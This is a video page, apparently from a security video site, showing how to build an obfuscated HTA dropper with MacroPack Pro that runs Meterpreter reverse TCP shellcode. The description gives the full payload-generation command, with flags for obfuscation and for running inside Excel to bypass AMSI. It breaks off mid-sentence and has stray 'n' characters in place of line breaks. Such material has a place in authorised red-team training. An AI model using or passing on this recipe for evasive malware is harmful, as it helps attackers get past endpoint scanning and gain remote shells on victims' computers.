Generate an obfuscated HTA Meterpreter payload with MacroPack Pro from nicepic Watch Video
Preview(s):
Gallery
Play Video: (Note: The default playback of the video is HD VERSION. If your browser is buffering the video slowly, please play the REGULAR MP4 VERSION or Open The Video below for better experience. Thank you!)
Description: This video shows how to generate an HTA payload able to run a shellcode, in this case a Meterpreter reverse TCP shellcode.nnHere is the command line used to generate the payload: necho meterx86.bin meterx64.bin | macro_pack.exe -t AUTOSHELLCODE--run-in-excel -o -G samplesnicepic.htannThe -o option is used to obfuscate the payload.nThe --run-in-excel option is used so the payload is run inside an Excel instance (bypass AMSI and needed to call windows API).nnI use the MacroPack AUTOSHELLCODE tem
Play Video: (Note: The default playback of the video is HD VERSION. If your browser is buffering the video slowly, please play the REGULAR MP4 VERSION or Open The Video below for better experience. Thank you!)